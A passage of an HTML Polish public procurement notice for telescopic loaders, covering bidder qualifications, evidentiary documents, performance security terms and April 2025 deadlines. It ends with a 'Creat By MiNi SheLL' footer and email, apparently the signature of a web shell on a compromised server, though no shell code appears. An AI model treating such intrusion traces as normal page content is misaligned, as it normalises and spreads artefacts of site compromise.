wyznacza szczegółowego warunku w tym zakresie,<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,<br/>4)	warunki zdolności technicznej lub zawodowej w zakresie:<br/>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej 3 dostawy, polegające na dostawie ładowarek teleskopowych o wartości min. 300 000 zł brutto każda. (Wykonawca musi wskazać dostawy, o których mowa powyżej w Załączniku nr 5 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia z wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających spełnienie warunków udziału w postępowaniu:<br/>1)	wykazu dostaw wykonanych w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, dat wykonania i podmiotów, na rzecz których dostawy te zostały wykonane oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli z przyczyn niezależnych Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wykaz dostaw należy sporządzić wg wzoru – Załącznik nr 5 do SWZ;<br/>2)	oświadczenia Wykonawcy o prawidłowości i aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ustawy Pzp w zakresie spełniania warunków postępowania wskazanych przez Zamawiającego oraz potwierdzające brak podstaw wykluczenia z postępowania wg wzoru – Załącznik nr 3 do SWZ.<br/>Uwaga <br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Oświadczenie wg wzoru – Załącznik nr 3 do SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>2.	Zamawiający informuje, że zgodnie z art. 127 ust. 1 ustawy Pzp nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli: <br/>1)	może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w ofercie dane umożliwiające dostęp do tych środków:<br/>2)	podmiotowym środkiem dowodowym jest Oświadczenie, którego treść odpowiada zakresowi Oświadczenia, o którym mowa w art. 125 ust. 1.<br/>3.	Zamawiający informuje, że zgodnie z art. 127 ust 2 ustawy Pzp, Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki i potwierdzi Oświadczeniem o ich prawidłowości i aktualności.<br/>4.	Podmiotowe środki dowodowe oraz inne dokumenty lub Oświadczenia należy przekazać Zamawiającemu przy użyciu środków komunikacji elektronicznej dopuszczonych w SWZ, w zakresie i sposobie określonych w przepisach rozporządzenia wydanego na podstawie art. 70 ustawy Pzp.<br/>5.	Podmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.<br/>6.	W zakresie nieuregulowanym niniejszą SWZ, zastosowanie mają przepisy rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia z wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających spełnienie warunków udziału w postępowaniu:<br/>1)	wykazu dostaw wykonanych w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, dat wykonania i podmiotów, na rzecz których dostawy te zostały wykonane oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli z przyczyn niezależnych Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wykaz dostaw należy sporządzić wg wzoru – Załącznik nr 5 do SWZ;<br/>2)	oświadczenia Wykonawcy o prawidłowości i aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ustawy Pzp w zakresie spełniania warunków postępowania wskazanych przez Zamawiającego oraz potwierdzające brak podstaw wykluczenia z postępowania wg wzoru – Załącznik nr 3 do SWZ.<br/>Uwaga <br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Oświadczenie wg wzoru – Załącznik nr 3 do SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>2.	Zamawiający informuje, że zgodnie z art. 127 ust. 1 ustawy Pzp nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli: <br/>1)	może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w ofercie dane umożliwiające dostęp do tych środków:<br/>2)	podmiotowym środkiem dowodowym jest Oświadczenie, którego treść odpowiada zakresowi Oświadczenia, o którym mowa w art. 125 ust. 1.<br/>3.	Zamawiający informuje, że zgodnie z art. 127 ust 2 ustawy Pzp, Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki i potwierdzi Oświadczeniem o ich prawidłowości i aktualności.<br/>4.	Podmiotowe środki dowodowe oraz inne dokumenty lub Oświadczenia należy przekazać Zamawiającemu przy użyciu środków komunikacji elektronicznej dopuszczonych w SWZ, w zakresie i sposobie określonych w przepisach rozporządzenia wydanego na podstawie art. 70 ustawy Pzp.<br/>5.	Podmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.<br/>6.	W zakresie nieuregulowanym niniejszą SWZ, zastosowanie mają przepisy rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu potwierdzenia zgodności oferowanego przedmiotu zamówienia z wymaganymi cechami opisanymi w niniejszej SWZ i załącznikach do SWZ, Zamawiający wymaga złożenia, wraz z ofertą, Kart katalogowych lub innych dokumentów służących identyfikacji oferowanego przedmiotu zamówienia. Karty katalogowe lub inne dokumenty muszą zawierać niezbędne informacje, które umożliwią Zamawiającemu ocenę zgodności oferty z opisem przedmiotu zamówienia.<br/>Karty katalogowe muszą zawierać co najmniej: nazwę handlową produktu, nazwę producenta, rodzaj/typ/model/wersję (zgodnie z właściwością produktu) oraz niezbędne informacje umożliwiające Zamawiającemu ocenę oferty pod kątem zgodności wszystkich wymaganych w OPZ parametrów produktu.. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1.	Zamawiający informuje, iż w przypadku nie złożenia wraz z ofertą przedmiotowych środków dowodowych, o których mowa powyżej lub w sytuacji w której złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>2.	Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/>UWAGA:<br/>Oferty zawierające błędne przedmiotowe środki dowodowe rozbieżne z opisem przedmiotu zamówienia zawartym w cz. IV SWZ, nie podlegają poprawie i zostaną odrzucone na podstawie art. 226 ust. 1 pkt 5), ustawy Pzp. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający nie wymaga złożenia innych oświadczeń i dokumentów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	W celu pokrycia roszczeń z tytułu niewykonania lub nienależytego wykonania umowy, Zamawiający będzie żądał wniesienia przez Wykonawcę, z którym zawrze umowę w sprawie zamówienia publicznego, zabezpieczenia należytego wykonania umowy w wysokości 2 % wartości oferty brutto.<br/>2.	Wykonawca zobowiązany będzie wnieść zabezpieczenie najpóźniej z dniem zawarcia umowy.<br/>3.	Zabezpieczenie należytego wykonania umowy może być wniesione w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo – kredytowej, (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4.	Zabezpieczenie należytego wykonania umowy wnoszone w pieniądzu należy przelać na rachunek bankowy Zamawiającego: Bank Millenium nr rachunku bankowego: 60 1160 2202 0000 0004 8664 3098.<br/>5.	Zabezpieczenie wnoszone w postaci poręczenia lub gwarancji musi zawierać następujące elementy:<br/>1)	nazwę Wykonawcy i jego siedzibę (adres),<br/>2)	nazwę Beneficjenta (Zamawiającego),<br/>3)	nazwę Gwaranta lub Poręczyciela,<br/>4)	określać wierzytelność, która ma być zabezpieczona gwarancją;<br/>5)	sformułowanie zobowiązania Gwaranta do nieodwołalnego i bezwarunkowego zapłacenia kwoty zobowiązania na każde żądanie zapłaty, w terminie do 14 dni od dnia złożenia przez Beneficjenta pisemnego żądania zapłaty w przypadku, gdy Wykonawca:<br/>a)	nie wykonał przedmiotu umowy w terminach wynikających z umowy;<br/>b)	wykonał nienależycie przedmiot umowy.<br/>6)	sformułowanie oświadczenia Gwaranta, że jakakolwiek zmiana, uzupełnienie lub modyfikacja warunków umowy pomiędzy Wykonawcą a Beneficjentem nie zwalnia Gwaranta od odpowiedzialności prawnej w ramach niniejszej gwarancji i tym samym Gwarant rezygnuje z konieczności powiadamiania go o tego typu zmianie.<br/>6.	Gwarant nie może także uzależniać dokonania zapłaty od spełniania jakichkolwiek dodatkowych warunków lub też od przedłożenia jakiejkolwiek dokumentacji. W przypadku przedłożenia gwarancji niezawierającej wymienionych elementów, bądź posiadającej jakiekolwiek dodatkowe zastrzeżenia, Zamawiający uzna, że Wykonawca nie wniósł zabezpieczenia należytego wykonania umowy.<br/>7.	Z chwilą zaistnienia przynajmniej jednego z wymienionych w pkt 5 ppkt 5 lit. a i lit. b przypadków, Zamawiający wystąpi do Gwaranta z pisemnym żądaniem zapłacenia kwoty stanowiącej zabezpieczenie należytego wykonania umowy.<br/>8.	W przypadku wniesienia wadium w pieniądzu Wykonawca może wnioskować o zaliczenie kwoty wadium na poczet zabezpieczenia.<br/>9.	W trakcie realizacji umowy Wykonawca może dokonać zmiany formy zabezpieczenia na jedną lub kilka form, o których mowa w pkt 3, przy czym zmiana form zabezpieczenia musi być dokonywana z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jego wysokości.<br/>10.	Zamawiający zwróci 70 % zabezpieczenia w terminie 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane na podstawie potwierdzonego przez Zamawiającego Protokołu zdawczo – odbiorczego.<br/>11.	Pozostałe 30% Zamawiający pozostawi na zabezpieczenie roszczeń z tytułu rękojmi za wady. Zamawiający zwróci tą kwotę nie później niż w 15 dniu po upływie okresu rękojmi za wady lub gwarancji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian jest zawarty w załączniku nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1083237</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-08 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wszelkie nieuregulowane w niniejszej SWZ czynności, uprawnienia, obowiązki Wykonawców i Zamawiającego, których ustawa Pzp nie nakazała zawierać Zamawiającemu w SWZ, a które mogą przyczynić się do właściwego przebiegu postępowania, reguluje ustawa Pzp.<br/>2.	W przypadku, gdy wartości podane przez Wykonawców na oświadczeniach i dokumentach, o których mowa w SWZ, podane będą w walucie innej niż PLN, Zamawiający przeliczy te wartości na PLN przyjmując średni kurs NBP danej waluty na dzień wszczęcia postępowania.<br/>3.	Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa wyżej jeżeli: w postępowaniu o udzielenie zamówienia prowadzonym w trybie podstawowym złożono tylko jedną ofertę.<br/>4.	Zamawiający przewiduje dokonanie zmian umowy w toku jej realizacji w przypadku zaistnieją okoliczności, o których mowa w art. 454 i 455 ustawy Pzp.<br/>5.	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.

Creat By MiNi SheLL
Email: jattceo@gmail.com